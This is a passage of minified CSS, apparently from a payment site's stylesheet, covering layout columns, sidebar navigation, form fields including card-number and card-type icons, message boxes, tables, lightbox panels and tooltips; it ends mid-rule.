.column{position:relative;display:inline-block;margin-right:2.13%;vertical-align:top;background:#CECFCE}#pge #content.sideposleft .column,#pge #content.sideposright .column{margin-right:2.86%}#pge #content.sideposleft .column.nogutter,#pge #content.sideposright .column.nogutter,#pge .column.nogutter{margin-right:0}#popup{margin:10px 20px 10px 9px}#popup #content{margin-top:0}#popup p.textright{margin-top:3px}#popup #footer{padding:0;margin:15px 0 18px}#headline .breadcrumb{margin-bottom:1em;font-size:.9em;line-height:normal}#headline .secure{float:right;width:180px;text-align:right}#headline .secure a{padding:3px 20px 0;background:url(/en_US/i/icon/secure_lock_2.gif) no-repeat right center;line-height:1.5em}#headline .backlink{float:right;width:205px;text-align:right}#headline h2{color:#C88039;font-size:1.33em}#headline .metadata{margin:.35em 0 0;color:#757575;font-size:.9em;line-height:1em}#headline .metadata li{display:inline;margin:0 .4em 0 0;*margin-right:.5em;border-right:1px solid #ccc;padding-right:.6em;*padding-right:.4em;list-style:none}#headline .metadata li.textright{float:right;margin:0;border:none;padding:0}#headline .metadata li.last{border:none}#headline .metadata + .progress{margin-top:.95em}#headline .progress{clear:both;margin:.6em 0 0;line-height:normal}#headline .progress li{display:inline;margin:0 1.25em 0 0;padding-bottom:.5em;color:#666;font-size:.9em}#headline .progress li strong{margin-right:.15em;border-right:1px solid #ccc;padding:.1em .2em .1em 0;color:#666;font-size:1.45em}#headline .progress li.current{color:#c88039}#headline .progress li.current strong{border:1px solid #c88039;padding:.1em .2em .1em .25em;color:#c88039}#headline .progress li.complete,#headline .progress li.complete strong{color:#ccc}#headline h3{clear:both;margin-top:.67em}#headline p{margin:1em 0 0;line-height:1.5em}#main{line-height:1.5}#sidebar{line-height:1.33}#footnotes{clear:both;padding-top:.5em;color:#333;font-size:.9em}#footnotes ul{margin:0;list-style-type:none}#footnotes ul li{margin:.2em;padding-left:1em;text-indent:-.7em}#footer{clear:both;padding:2em 9em 1em;color:#999;font-size:.9em;text-align:center}#footer img{vertical-align:middle}#footer ul{margin:.7em 0;list-style-type:none}#footer ul li{display:inline-block;margin:0;border-right:1px solid #999;padding-left:.4em}#footer ul li.first{background:none}#footer ul li.last{border-right:0}#footer ul li a{margin-right:.5em;white-space:nowrap}#navFull{overflow:auto;padding:2em 0 1em}#navFull ul{list-style-type:none}#navFull li{float:left;width:14em}#navFull ul ul{list-style-type:disc}#navFull ul ul li{float:none;width:auto}.layout1,.layout2,.layout2a,.layout2b,.layout2c,.layout2d,.layout3{clear:both;overflow:visible}#content div.col{float:left}#content div.col.last{float:right;margin-right:0}#page .layout2 div.col{width:369px}#page .layout2a div.first,#page .layout2c div.last{width:180px}#page .layout2a div.last,#page .layout2c div.first{width:560px}#page .layout2b div.first,#page .layout2d div.last{width:218px}#page .layout2b div.last,#page .layout2d div.first{width:522px}#page .layout3 div.col{width:242px}#page .layout3 div.first{margin-right:12px}#page .sideposleft .layout2 div.col,#page .sideposright .layout2 div.col{width:275px}#page .sideposleft .layout2a div.last,#page .sideposright .layout2a div.last{width:370px}#page .sideposleft .layout2b div.last,#page .sideposright .layout2b div.last{width:332px}#page .sideposleft .layout2c div.first,#page .sideposright .layout2c div.first{width:370px}#page .sideposleft .layout2d div.last,#page .sideposright .layout2d div.last{width:218px}#page .sideposleft .layout3 div.col,#page .sideposright .layout3 div.col{width:180px}#stdpage .layout2 div.col{width:460px}#stdpage .layout2a div.first,#stdpage .layout2c div.last{width:300px}#stdpage .layout2a div.last,#stdpage .layout2c div.first{width:700px}#stdpage .layout2b div.first,#stdpage .layout2d div.last{width:300px}#stdpage .layout2b div.last,#stdpage .layout2d div.first{width:620px}#stdpage .layout2e div.first,#stdpage .layout2f div.last{width:560px}#stdpage .layout2e div.last,#stdpage .layout2f div.first{width:360px}#stdpage .layout3 div.col{width:300px}#stdpage .layout3 div.first{margin-right:20px}#stdpage .layout4 div.col{width:220px}#stdpage .layout4 div.first,#stdpage .layout4 div.second{margin-right:20px}#stdpage .sideposleft .layout2 div.col,#stdpage .sideposright .layout2 div.col{width:340px}#stdpage .sideposleft .layout2a div.last,#stdpage .sideposright .layout2a div.last{width:460px}#stdpage .sideposleft .layout2b div.last,#stdpage .sideposright .layout2b div.last{width:400px}#stdpage .sideposleft .layout2c div.first,#stdpage .sideposright .layout2c div.first{width:460px}#stdpage .sideposleft .layout2d div.last,#stdpage .sideposright .layout2d div.last{width:400px}#stdpage .sideposleft .layout3 div.col,#stdpage .sideposright .layout3 div.col{width:220px}#pge .one,.sb_18 .one{width:100%}#pge .nsb_6_18 .one{width:23.4%}#pge .nsb_6_18 .two{width:74.47%}#pge .nsb_8_16 .one{width:31.91%}#pge .nsb_8_16 .two{width:65.96%}#pge .nsb_10_14 .one{width:40.43%}#pge .nsb_10_14 .two{width:57.44%}#pge .nsb_12_12 .one{width:48.94%}#pge .nsb_12_12 .two{width:48.93%}#pge .nsb_14_10 .one{width:57.44%}#pge .nsb_14_10 .two{width:40.43%}#pge .nsb_16_8 .one{width:65.96%}#pge .nsb_16_8 .two{width:31.91%}#pge .nsb_18_6 .one{width:74.47%}#pge .nsb_18_6 .two{width:23.4%}#pge .nsb_8_8_8 .one{width:31.91%}#pge .nsb_8_8_8 .two{width:31.91%}#pge .nsb_8_8_8 .three{width:31.92%}#pge .nsb_12_6_6 .one{width:48.94%}#pge .nsb_12_6_6 .two{width:23.4%}#pge .nsb_12_6_6 .three{width:23.4%}#pge .nsb_6_12_6 .one{width:23.4%}#pge .nsb_6_12_6 .two{width:48.94%}#pge .nsb_6_12_6 .three{width:23.4%}#pge .nsb_6_6_12 .one{width:23.4%}#pge .nsb_6_6_12 .two{width:23.4%}#pge .nsb_6_6_12 .three{width:48.94%}#pge .nsb_6_6_6_6 .one{width:23.4%}#pge .nsb_6_6_6_6 .two{width:23.4%}#pge .nsb_6_6_6_6 .three{width:23.4%}#pge .nsb_6_6_6_6 .four{width:23.4%}#pge .sb_6_12 .one{width:31.43%}#pge .sb_6_12 .two{width:65.71%}#pge .sb_8_10 .one{width:42.86%}#pge .sb_8_10 .two{width:54.28%}#pge .sb_9_9 .one{width:48.57%}#pge .sb_9_9 .two{width:48.57%}#pge .sb_10_8 .one{width:54.28%}#pge .sb_10_8 .two{width:42.86%}#pge .sb_12_6 .one{width:65.71%}#pge .sb_12_6 .two{width:31.43%}#pge .sb_6_6_6 .one{width:31.43%}#pge .sb_6_6_6 .two{width:31.43%}#pge .sb_6_6_6 .three{width:31.42%}#sidebar .nav{border:1px solid #ccc;margin:1em 0}#sidebar .nav a{text-decoration:none}#sidebar .nav a:hover{text-decoration:underline}#sidebar .nav .header{border-bottom:1px solid #ccc;padding:4px 9px;background:url(/en_US/i/pui/side_nav_bg.gif) left bottom repeat-x}#sidebar .nav ul{margin:0}#sidebar .nav ul li{margin:0;border-bottom:1px solid #eee;padding:4px 5px 3px 18px;background:#fafafa url(/en_US/i/pui/icons_left_nav_1030x9.gif) 6px 7px no-repeat;list-style:none}#sidebar .nav ul li li,#sidebar .nav ul li li li{border:none;padding-left:12px}#sidebar .nav ul li.active{background-color:#fff;background-position:-197px 8px;font-weight:700}#sidebar .nav ul li.active li,#sidebar .nav ul li.open li{background-color:#fff}#sidebar .nav ul li.active.open{background-position:-606px 8px}#sidebar .nav ul li.open{background-position:-401px 8px;background-color:#fff}#sidebar .nav ul li.open li.open{background-position:-407px 8px;padding-bottom:0}#sidebar .nav ul li.open li.active{background-position:-203px 8px}#sidebar .nav ul li.open li.active.open{background-position:-612px 8px}#sidebar .nav ul li.open li li.active{background-position:-1019px 8px}#sidebar .nav ul li.active li{font-weight:400}#sidebar .nav ul li li{background-position:0 8px}#sidebar .nav ul li li li{background-position:-816px 8px;padding-left:12px}#sidebar .nav ul li li li.active{background-position:-1011px 8px}#sidebar .nav ul li.last{border:none}#sidebar .box{border:1px solid #ccc;margin:1em 0}#sidebar .box .header{background-color:#eee;padding:4px 10px;margin-top:1px;border-bottom:1px solid #ccc}#sidebar .box .body{padding:10px}#sidebar .box .last{margin-bottom:0}#sidebar .box a{text-decoration:none}#sidebar .box a:hover{text-decoration:underline}#sidebar .box p{margin:0}#sidebar .box ul{margin:0;margin-left:3px;*margin-left:6px;padding:0}#sidebar .box ol{margin:0;margin-left:9px;*margin-left:15px;padding:0}#sidebar .box ul li,#sidebar .box ol li{margin-left:10px;padding-left:0;margin-bottom:.4em}#sidebar .box.links ul{color:#757575}#sidebar .box.graphic .header{padding:0;border:none}#sidebar .box.noborder{border:none}#sidebar .box .action{margin-top:1em;text-align:center}#sidebar .box .subhead{margin-bottom:3px}#sidebar .box.help ul{margin:0}#sidebar .box.help a{text-decoration:underline}#sidebar .box.help ul li{display:inline;margin:0 .4em 0 0;border-right:1px solid #333;padding-right:.6em;list-style:none}#sidebar .box.help ul li.last{border:none}#sidebar .box.supp .header{background:none;border-bottom:1px solid #ccc;margin:0 10px;padding:4px 0}#sidebar .box.supp .break{margin-top:.9em;border-top:1px solid #ccc;padding-top:.7em}.cont{padding:10px;background:transparent}.cont.border{border:1px solid #ccc}.cont.white{background:#fff}.cont.blue{background:#e8f1f8}.cont.blue_grad{border:1px solid #ccc;background:#fff url(/en_US/i/pui/cont_blue_30.gif) left bottom repeat-x}.cont.blue_grad_tall{border:1px solid #ccc;background:#fff url(/en_US/i/pui/cont_blue_70.gif) left bottom repeat-x}.cont.grey{background:#eee}.cont.grey_grad{border:1px solid #ccc;background:#fff url(/en_US/i/pui/cont_grey_30.gif) left bottom repeat-x}.cont.grey_grad_tall{border:1px solid #ccc;background:#fff url(/en_US/i/pui/cont_grey_70.gif) left bottom repeat-x}.cont.yellow{background:#fec}.cont.yellow_border{border:1px solid #cfb893;background:#fec}.cont .header{float:left;width:100%;border-bottom:1px solid #ccc;margin-bottom:8px;padding-bottom:8px}.cont .header.alt{border-bottom:0;margin-bottom:0}.cont .header h4{float:left}.cont .header ul{float:right;list-style:none;margin:0 -10px 0 0}.cont .header li{display:inline;margin:0;padding:0 10px;border-left:1px solid #999}.cont .header li a{font-size:11px}.cont .header li.first{border-left:none;margin-right:0!important}.cont .body{clear:both}input.xsmall{width:2em}input.small{width:3.35em;font-size:1em}input.xxsmall{width:3.49em}input.xxxsmall{width: 3.3em}input.medium{width:7em}input.xmedium{width:9em}input.xxmedium{width:12em}input.large{width:14em}input.xlarge{width:20em}select.smal{border:1px solid #84a8cc;margin-bottom:2px;width:4.9em}select.mediu{border:1px solid #84a8cc;margin-bottom:2px;width:5.9em}p.group span.label{display:block;margin:.1em 0}span.optional{color:#757575;font-size:.9em}span.autoTooltip{margin-left:5px;color:#084482;font-size:.9em}span.helplink{font-size:.9em}span.help{display:block;margin:.1em 0;color:#757575;font-size:.9em}span.description{display:block;margin:.1em 0 0 1.6em}form #cc_number{background-image:url(../icon/sprites_cc_global.png);background-position:167px 86.8%;background-repeat:no-repeat;padding-right:35px}form #cc_number.valid.visa{background-position:167px -.5%}form #cc_number.valid.mastercard{background-position:167px 6%}form #cc_number.valid.amex{background-position:167px 12%}form #cc_number.valid.diners_club_international{background-position:167px 24%}form #cc_number.valid.jcb{background-position:167px 31%}form #cc_number.valid.discover{background-position:167px 18.3%}form #cc_number.valid.maestro{background-position:167px 37%}form #cvv2_number{background-image:url(../icon/sprites_cc_global.png);background-position:54px 93.2%;background-repeat:no-repeat;padding-right:40px}form #cvv2_number.amex{background-position:54px 99.2%}form fieldset.multi p{float:left;margin:0 .5em 0 0}form fieldset.multi legend,form fieldset.group legend{font-weight:400}form fieldset.multi div.fields{overflow:auto;height:1%}form div.collapse{overflow:auto;margin:1em 0}form div.collapse p,form div.collapse fieldset{float:left;margin-top:0;margin-right:1em;margin-bottom:0}form .subform{margin:.4em 0}form .subform .cont{clear:left;position:relative;overflow:auto}form .subform .cont .multi span.label{position:relative;text-align:left}form .subform .cont .multi p.group{float:left;margin:0 .2em 1em}form .subform .cont p.group{float:none;margin:0 0 1em}form .subform .cont p.group label{float:none;text-align:left;width:auto}form .subform .cont p.group span.help,form .subform .cont p.group span.field{margin-left:0;padding-left:0}form .subform .group legend span.label{position:relative;display:block;width:auto;margin-bottom:1em;text-align:left}form .subform .group .cont{margin-left:21px}form.edit .subform{margin-left:200px}form.edit .subform fieldset{margin-top:0}form.edit .subform fieldset.multi legend,form.edit .subform fieldset.group legend{position:static}form.edit .group .subform,form.edit .group .subform div,form.edit .subform fieldset.group div{margin-left:0}form.edit .subform .buttons{padding-left:0}form.edit .group .subform .cont{margin-left:21px}form .subform .multi{margin-top:.5em}form .subform .multi .group{margin-left:0}.fcenter{margin-left:8% !important; margin-right:8% !important;}.bcenter{margin-left:41.5% !important;margin-right:41.5% !important;padding-top:20px;padding-bottom:10px}form.edit .group{position:relative}form.edit p.group{overflow:auto;min-height:2em;_height:2em}form.edit p.group.textbox{min-height:5em;_height:5em}form.edit p.group.help.textbox{min-height:6.5em;_height:6em}form.edit p.group label,form.edit p.group span.label{float:left;clear:left;width:180px;margin:0;text-align:right}form.edit p.group span.labelText,form.edit p.group span.optional{display:block}form.edit p.group span.autoTooltip{float:right}form.edit p.group span.helplink{float:right}form.edit p.group span.help,.legacyErrors form.error.edit p.error span.help,form.error.edit fieldset.multi.error span.help{display:block;padding-left:20px;margin-left:181px}form.edit p.group span.field,.legacyErrors form.error.edit p.error span.field,.legacyErrors form.error.edit fieldset.error .fields{display:block;margin-left:200px}form.edit fieldset.multi legend,form.edit fieldset.group legend{position:absolute;top:0;left:0;width:180px;text-align:right}form.edit legend span.label,form.edit legend span.optional{display:block;width:180px}form.edit fieldset.multi{position:relative}form.edit fieldset.multi p *,form.edit fieldset.multi p.group span.field{margin-left:0}form.edit fieldset.multi span.help,form.edit fieldset.group span.help{padding-left:20px;margin-left:181px}form.edit fieldset.multi p.group label{text-align:left;width:auto;float:none}form.edit fieldset.multi p.group span.help{padding-left:0;margin-left:0}form.edit fieldset.multi span.labels,form.edit fieldset.group span.labels{float:left;display:block;width:180px;text-align:right}form.edit fieldset.multi .subform span.labels,form.edit fieldset.group .subform span.labels{text-align:left}form.edit .labels span.label,form.edit .labels span.optional{display:block;width:180px}form.edit fieldset.multi div.fields{overflow:auto;height:1%;margin-left:200px;min-width:250px}form.edit fieldset.group .subform fieldset div.fields,form.edit fieldset.multi .subform fieldset div.fields,form.edit .subform fieldset div.fields{clear:both;margin-left:0}form.edit .multi .subform{margin-left:0}form.edit fieldset.group div{margin-left:200px}form.edit fieldset.group ul{margin:0 0 0 200px}form.edit fieldset.group ul li{margin-left:0;list-style:none}form.edit fieldset.group ul li label{display:inline}form.edit fieldset.group .subform p.first{margin-left:0}form.edit fieldset.group .subform p.group label{display:inline;width:auto}form.edit fieldset.group .subform span.field{display:inline;margin-left:10px}form.edit fieldset.group .subform span.label{position:relative}form.edit div.collapse p,form.edit div.collapse fieldset{float:none;margin-top:1em;margin-right:1em;margin-bottom:0}form.edit p.buttons,form.edit div.buttons{padding-left:201px}form.error p,form.error fieldset{margin-left:20px}form.error .error{margin-left:0}form.error p.error label,form.error p.error span.help,form.error p.error span.field,form.error fieldset.error span.help,form.error fieldset.error div,form.error fieldset.error span.label{padding-left:20px}form.error .error legend{padding-left:20px}form.error .error span.help{color:#c00;background:url(/en_US/i/icon/form_error.png) 2px top no-repeat}.legacyErrors label span.error,.legacyErrors p.error label,.legacyErrors fieldset.error span.label,.legacyErrors fieldset span.label.error{color:#c00}form.edit.error p,form.edit.error fieldset{margin-left:0}form.edit.error p.error label,form.edit.error p.error span.field,form.edit.error fieldset.error legend,form.edit.error fieldset.error div,form.edit.error fieldset.error ul{padding-left:0}form.edit.error fieldset.multi span.help{margin-left:181px}form.edit.error fieldset.multi p.group span.field,form.edit.error fieldset.multi span.label,form.edit.error fieldset.group span.label{padding-left:0}form.edit.error fieldset.multi .first{margin-left:0}form.edit.error fieldset.multi p.group span.help{margin-left:0}form.edit.error fieldset.multi.error p.group label{padding-left:0}form.error fieldset.error p.group span.help{padding-left:0;color:#757575;background:none}.legacyErrors form.error p,.legacyErrors form.error fieldset{margin-left:0}.legacyErrors form.error .error span.help{background:transparent}.legacyErrors form.error p.error label,.legacyErrors form.error p.error span.help,.legacyErrors form.error p.error span.field,.legacyErrors form.error fieldset.error span.help,.legacyErrors form.error fieldset.error .first label,.legacyErrors form.error fieldset.error .first span.field,.legacyErrors form.error fieldset.error div,.legacyErrors form.error .error legend,.legacyErrors form.error fieldset.error span.label,form.error fieldset.multi.error p.group span.help{margin-left:0;padding-left:0}.legacyErrors form label span.error,.legacyErrors form.error p.error label,.legacyErrors form.error fieldset.error span.label,.legacyErrors form.error fieldset span.label.error,.legacyErrors form fieldset span.error{color:#c00}.review table{margin:1em 0;border:none}.review table th{width:180px;padding:0 20px 1em 0;background-color:#fff;color:#757575;font-weight:400;text-align:right}.review table td{padding:0 0 1em}.review p.buttons,.review div.buttons{padding-left:201px;clear:left;margin-bottom:0}.review p.buttons button,.review p.buttons input.button{margin-bottom:1em}form div.cctype.icon label{float:left;height:23px;width:40px;margin-right:.8em}form div.cctype.icon label input,form div.cctype.icon label span{display:block;position:absolute;top:0;left:-500em;width:1px;height:1px;overflow:hidden;text-indent:-9999em;line-height:0}form div#cctype.radio label{width:49%;height:37px;float:left;background:none}form div.cctype.radio label input{float:left}form div.cctype.radio label span{display:block;padding-left:5px;padding-top:2px}form div.cctype.radio label#pm-visa span{padding-top:0}form div.cctype.radio label span.cclogo{width:37px;height:30px;float:left;height:23px;margin-left:1px}form div.cctype.radio label span.cclogo.banamex,form div.cctype.icon label.banamex{width:60px}form div.cctype.radio label span.cclogo.banorte,form div.cctype.icon label.banorte{width:62px}form div.cctype.radio label span.cclogo.hsbc,form div.cctype.icon label.hsbc{width:50px}form div.cctype.radio label span.cclogo.santander,form div.cctype.icon label.santander{width:58px}form.edit .fieldrowCSCAsOptional p.group{margin-bottom:0}form div.cctype .maestro{background:url(/en_US/i/logo/logo_cc_maestro_37x23.gif) no-repeat top left}form div.cctype .visa{background:url(/en_US/i/logo/payment_icons_sprite.2D.png) no-repeat left -30px}form div.cctype .mc{background:url(/en_US/i/logo/payment_icons_sprite.2D.png) no-repeat left -60px}form div.cctype .disc{background:url(/en_US/i/logo/payment_icons_sprite.2D.png) no-repeat left -90px}form div.cctype .amex{background:url(/en_US/i/logo/payment_icons_sprite.2D.png) no-repeat left -120px}form div.cctype .cb{background:url(/en_US/i/logo/payment_icons_sprite.2D.png) no-repeat scroll -50px -30px}form div.cctype .cetelem{background:url(/en_US/i/logo/payment_icons_sprite.2D.png) no-repeat scroll -50px -60px}form div.cctype .cetelem.ES{background:url(/en_US/i/logo/payment_icons_sprite.2D.png) no-repeat scroll -150px -30px}form div.cctype .cetelem.IT{background:url(/en_US/i/logo/payment_icons_sprite.2D.png) no-repeat scroll -100px -30px}form div.cctype .cofinoga{background:url(/en_US/i/logo/payment_icons_sprite.2D.png) no-repeat scroll -50px -90px}form div.cctype .cofidis{background:url(/en_US/i/logo/payment_icons_sprite.2D.png) no-repeat scroll -50px -120px}form div.cctype .electron{background:url(/en_US/i/logo/payment_icons_sprite.2D.png) no-repeat scroll left -150px}form div.cctype .postepay{background:url(/en_US/i/logo/payment_icons_sprite.2D.png) no-repeat scroll -100px -60px}form div.cctype .jcb{background:url(/en_US/i/logo/payment_icons_sprite.2D.png) no-repeat scroll -200px -30px}form div.cctype .prepaid{background:url(/en_US/i/logo/payment_icons_sprite.2D.png) no-repeat scroll -100px -90px}form div.cctype .bank{background:url(/en_US/i/logo/payment_icons_sprite.2D.png) no-repeat scroll left -240px}form div.cctype .cup{background:url(/en_US/i/logo/payment_icons_sprite.2D.png) no-repeat left -270px}form div.cctype .bancomer{background:url(/en_US/i/logo/payment_icons_sprite.2D.png) no-repeat left -300px}form div.cctype .qiwi{background:url(/en_US/i/logo/payment_icons_sprite.2D.png) no-repeat -250px -30px}form div.cctype .banamex,form div.cctype .banorte,form div.cctype .hsbc,form div.cctype .santander{background:url(/en_US/MX/i/logo/sprite_logo_mxbanks_w270xh43.gif) no-repeat}form div.cctype .banamex{background-position:0 -10px}form div.cctype .banorte{background-position:-70px -10px}form div.cctype .hsbc{background-position:-140px -10px}form div.cctype .santander{background-position:-200px -10px}form div.cctype .elo{background:url(/en_US/i/logo/payment_icons_sprite.2D.png) no-repeat scroll -300px -30px}form div.cctype .hipercard{background:url(/en_US/i/logo/payment_icons_sprite.2D.png) no-repeat scroll -293px -60px;width:47px!important}form div.cctype .hiper{background:url(/en_US/i/logo/payment_icons_sprite.2D.png) no-repeat scroll -300px -90px}form div.cctype.radio{width:380px}form div.cctype.selected label{opacity:.13;filter:alpha(opacity=13)}form div.cctype.selected label.hilite{opacity:1;filter:alpha(opacity=100)}div#payment_type li{list-style:none;margin-left:0;padding-left:0;clear:both}div.radioDD,div.radioPayment{float:left;margin-bottom:0;margin-right:5px;min-height:30px}div.radioCC{clear:left}div#fieldsBank.opened,div#fieldsCC.opened{clear:both}input#radioBank,input#radioCC{border:none}form.edit div#cctypes{margin-left:200px}label#ddlabel{display:none}form.edit label#ddlabel{display:block;width:180px;text-align:right;float:left}form.edit #cupcheck{padding:0 0 0 200px;margin:0}form.edit #cupcheck input{margin-left:0}form.edit #fieldsCC #cardIssueInformation .label .optional{left:0}.small{font-size:.9em}.secondary{color:#757575}.heavy{font-weight:700}.jsEnabled .jsHide{display:none}h2.secondary,h3.secondary,h4.secondary,h4.alternate{color:#333}h3.alternate{color:#C88039}.nonjsAlert{margin:1em;border:1px solid red;padding:.5em;color:red;text-align:center}.accessAid{display:block!important;position:absolute!important;top:0!important;left:-500em!important;overflow:hidden!important;text-align:left!important;text-indent:-9999em!important;line-height:0!important;width:1px!important;height:1px!important}.hide{display:none!important}.show{display:block!important}.clear{clear:both!important}.textright{text-align:right!important}.textcenter{text-align:center!important}.textleft{text-align:left!important}a.callToAction{padding-left:17px;background:url(/en_US/i/pui/main/icon_orange_arrow.gif) 0 50% no-repeat;font-weight:700}a.footnote{border:none;text-decoration:none}ul.arrow{margin:1.6em 0;list-style:none}ul.arrow li{margin:0 0 .8em;padding-left:.8em;background:url(/en_US/i/pui/core/icon_content_arrow.gif) 0 .5em no-repeat}ul.arrow ul{list-style:none}div.messageBox{width:auto;min-height:44px;margin:1em 0;border:1px solid #ffcf0f;padding:0 12px;background-color:#ffffde;background-position:20px 10px;background-repeat:no-repeat}div.messageBox p{margin:10px 0}div.messageBox.notification{border-color:#81a4c6;padding-left:55px;background-color:#f0f6fd;background-image:url(/en_US/i/icon/icon_info_24wx24h.gif)}div.messageBox.confirmation{border-color:#c4de95;padding-left:55px;background-color:#f8feee;background-image:url(/en_US/i/icon/icon_success_24wx24h.gif)}div.messageBox.error,div.messageBox.alert{padding-left:55px;background-image:url(/en_US/i/icon/icon_alert_24wx24h.gif)}div.messageBox ul{position:absolute;top:0;left:-500em;width:1px;height:1px;overflow:hidden;text-indent:-9999em;line-height:0}.legacyErrors div.messageBox ul{position:relative;height:auto;width:auto;left:0;top:0;text-indent:0;overflow:visible;line-height:1em}div.inlineMessage{width:auto;margin:10px 0;padding:0 2px 0 26px;background-position:5px 0;background-repeat:no-repeat}div.inlineMessage.info{background-image:url(/en_US/i/icon/icon_sysinfo_16x16.gif)}div.inlineMessage.warn{background-image:url(/en_US/i/icon/icon_sysalert_16x16.gif);color:#c60000}table.basic{border:1px solid #eee;border-bottom:none;border-collapse:separate;border-spacing:0 0}table.basic th{border-bottom:1px solid #fff;border-right:1px solid #fff;padding:6px 8px;background-color:#e8f1fa;font-size:.9em;font-weight:400;text-align:left;vertical-align:bottom}table.basic th:last-child{border-right:none}table.basic td{border-bottom:1px solid #eee;padding:8px 10px 8px 8px}table.lite{border-bottom:1px solid #eee}table.lite th{border-left:1px solid #fff;padding:6px 8px;background-color:#e8f1fa;font-size:.9em;font-weight:400;text-align:left;vertical-align:bottom}table.lite th:first{border-left:none}table.lite td{border-bottom:1px solid #eee;padding:8px 10px 8px 8px}table.mini{border-bottom:1px solid #eee}table.mini th{padding:3px 8px;color:#757575;font-size:.9em;font-weight:400;text-align:left;vertical-align:bottom}table.mini td{border-top:1px solid #eee;padding:8px 10px 8px 8px}table.bare{border-bottom:1px solid #eee}table.bare th{padding:3px 8px;border-bottom:1px solid #eee;color:#757575;font-size:.9em;font-weight:400;text-align:left;vertical-align:bottom}table.bare td{padding:8px 10px 8px 8px}table.alt th{background-color:#eee}table.header-y th{padding-top:8px}table.header-y tr:first-child td{border-top:none}table.header-xy thead tr:first-child th:first-child{background-color:#fff}table.header-xy tr th:first-child{padding-top:8px}table.lite.header-y tr th{border-top:1px solid #eee;border-left:none}table.lite.header-y tr:first-child th{border-top:1px solid #eee}table.lite.header-y tr:first-child td{border-top:1px solid #eee}table.lite.header-y td{padding:8px 10px}.yui-overlay{display:block;position:absolute}.mask{display:none;position:absolute;top:0;left:0;z-index:0;background-color:#fff;opacity:.8;-moz-opacity:.8;filter:alpha(opacity=80)}.yui-panel-container{position:absolute!important;z-index:15;visibility:hidden;overflow:visible;width:440px;background-color:transparent}.yui-panel-container.shadow{padding:0;background-color:transparent}.yui-panel-container.shadow .underlay{border-right:2px solid #999;border-bottom:2px solid #999;position:absolute;top:3px;left:3px;z-index:0;visibility:inherit;width:100%;height:100%;background-color:#000;opacity:.3;-moz-opacity:.3;filter:alpha(opacity=30)}.yui-panel{position:relative;top:0;left:0;z-index:16;visibility:hidden;overflow:hidden;border:1px solid #369;border-collapse:separate;padding:30px 20px 0}.yui-panel .messageBox{min-height:48px;margin:1em 0;padding:0 15px 0 50px;background-color:#ffc;background-position:12px 12px}.yui-panel .container-close{overflow:hidden;text-indent:-1000em}.lightbox .yui-panel{background-color:#fff}.lightbox .yui-panel .header,.lightbox .yui-panel .header *{margin:0;padding:0;background-color:#fff;font-weight:700}.lightbox .yui-panel .header *{padding-bottom:.3em}.lightbox .yui-panel .body{overflow:hidden;margin-bottom:20px}.lightbox .yui-panel .body p{margin:1em 0}.lightbox .yui-panel .body form.error p.error,.lightbox .yui-panel .body form.error fieldset.error{margin-left:0}.lightbox .yui-panel .body form.error p,.lightbox .yui-panel .body form.error fieldset{margin-left:20px}.lightbox .yui-panel .container-close{position:absolute;top:5px;right:5px;z-index:6;visibility:inherit;width:15px;height:15px;margin:0;padding:0;background:url(/en_US/i/pui/lightbox/close.gif) no-repeat;cursor:pointer}.lightbox .yui-panel .body .buttons{text-align:right}.lightbox .yui-panel .footer{padding:8px 0 12px;color:#757575;font-size:11px}.lightbox .yui-panel .footer .paypal{display:block;float:left;width:49px;height:15px;margin-right:.5em;background:url(/en_US/i/pui/lightbox/logo.gif) 0 0 no-repeat}.lightbox .yui-panel .footer .paypal span{display:block;position:absolute;top:0;left:-500em;width:1px;height:1px;overflow:hidden;text-indent:-9999em;line-height:0}.lightbox .yui-panel .footer .secure{margin-bottom:4px;padding-left:15px;background:url(/en_US/i/pui/lightbox/icon_lock.gif) 2px 50% no-repeat}.lightboxMarkup{display:none}.autoTooltip{cursor:pointer}.balloonControl,.autoTooltip{border-bottom:1px dashed #084482;text-decoration:none}.balloon{z-index:16;width:250px;margin:0;padding:0;line-height:15px}.balloon .yui-panel{border:none}.balloon .header{position:absolute;top:-999px;left:-999px}.balloon .body{padding:10px 15px}.balloon .posUnder{padding:13px 0 0;background:url(/en_US/i/pui/scr/tooltip_sprite.gif) -500px top no-repeat}.balloon .posUnder .body{border:1px solid #666;border-top-width:0;padding:12px 17px 10px 8px;background:#ffffe5}.balloon .posOver{padding:0 0 12px;background:url(/en_US/i/pui/scr/tooltip_sprite.gif) 0 bottom no-repeat}.balloon .posOver .body{border:1px solid #666;border-bottom-width:0;padding:8px 17px 12px 8px;background:#ffffe5}.balloon .posUnder.right{background:url(/en_US/i/pui/scr/tooltip_sprite_right.gif) -751px top no-repeat}.balloon .posOver.right{background:url(/en_US/i/pui/scr/tooltip_sprite_right.gif) -249px bottom no-repeat}.miniLayout .balloon .posUnder{background:url(/en_US/i/pui/scr/tooltip_sprite_mini.gif) -465px top no-repeat}.miniLayout .balloon .posUnder .body{margin-top:-2px}.miniLayout .balloon .posOver{background:url(/en_US/i/pui/scr/tooltip_sprite_mini.gif) -475px bottom no-repeat}.miniLayout .balloon .posOver .body{margin-bottom:-2px}.cardstack,.cardstack .card{margin:1em 0}.cardstack ol.tabs{z-index:1;position:relative;overflow:auto;margin:0 0 -1px;list-style-type:none}.cardstack ol.tabs li{float:left;margin:.4em 0 0 5px;border:1px solid #ccc;padding:.4em .9em;background:#ddd url(/en_US/i/pui/core/tab_bg.gif) top left repeat-x}.cardstack ol.tabs li a{text-decoration:none}.cardstack ol.tabs li a:hover,.cardstack ol.tabs li a:active{text-decoration:underline}.cardstack ol.tabs li a span{display:block;margin-top:1px;color:#757575;font-size:1em;text-decoration:none!important}.cardstack ol.tabs li.top{margin-top:0;border-bottom:1px solid #fff;padding-top:.8em;background:#fff}.cardstack ol.tabs li.top a{color:#333;font-weight:700;text-decoration:none;cursor:default}.cardstack.vertical ol.tabs{float:left;width:20%}.cardstack.vertical ol.tabs li{float:none;margin:0 10px 0 0;border:none;border-top:1px solid #fff;border-bottom:1px solid #ccc;padding:.45em 0 .65em .6em;background:none;line-height:normal}.cardstack.vertical ol.tabs li a{color:#083772}.cardstack.vertical ol.tabs li a span{font-size:.9em}.cardstack.vertical ol.tabs li.top{border:none;padding:.55em 10px .55em .6em;background:#fff;margin-right:0}.cardstack.vertical ol.tabs li.top a{color:#333}.cardstack.vertical ol.tabs li.top span{color:#333;font-weight:400}.cardstack.vertical ol.tabs li.first,.cardstack.vertical ol.tabs li.next{border-top:none}.cardstack.vertical ol.tabs li.last,.cardstack.vertical ol.tabs li.previous{border-bottom:none}.cardstack.stacked 